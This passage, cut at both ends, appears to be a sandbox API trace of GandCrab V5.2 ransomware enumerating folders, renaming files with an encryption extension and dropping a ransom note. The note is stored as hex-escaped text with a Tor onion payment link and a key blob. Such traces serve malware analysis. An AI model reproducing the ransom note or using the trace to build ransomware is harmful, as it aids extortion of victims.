7\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.201] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0072.201] CloseHandle (hObject=0x2bc) returned 1 [0072.202] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.202] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.202] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0x200)) [0072.202] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.202] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.203] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.203] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a09d2ca4deb61a.lock") returned 90 [0072.203] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0072.203] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.204] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.204] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned 66 [0072.204] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" [0072.204] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503738 [0072.204] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.204] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.205] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.205] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.205] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.205] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.205] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.205] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a09d2ca4deb61a.lock" [0072.205] lstrlenW (lpString=".titwmvjl") returned 9 [0072.205] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a09d2ca4deb61a.lock") returned 90 [0072.205] VirtualAlloc (lpAddress=0x0, dwSize=0xf4, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.205] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 99 [0072.205] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a09d2ca4deb61a.lock") returned 90 [0072.205] lstrlenW (lpString=".lock") returned 5 [0072.205] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.205] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.205] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.206] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.206] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.206] lstrcmpW (lpString1="Quick Launch", lpString2=".") returned 1 [0072.206] lstrcmpW (lpString1="Quick Launch", lpString2="..") returned 1 [0072.206] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="Quick Launch" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0072.206] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\" [0072.206] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.206] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.207] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.207] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.207] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.207] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.207] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.207] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.207] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.207] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.208] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.208] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\TITWMVJL-DECRYPT.txt") returned 100 [0072.208] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0072.208] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x